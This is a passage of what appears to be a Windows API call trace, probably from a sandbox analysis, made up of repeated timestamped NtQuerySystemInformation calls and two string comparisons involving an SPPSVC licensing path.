Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc250, Length=0x20, ResultLength=0x0) [0270.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0270.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.799] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0270.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.809] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x50, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0270.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, 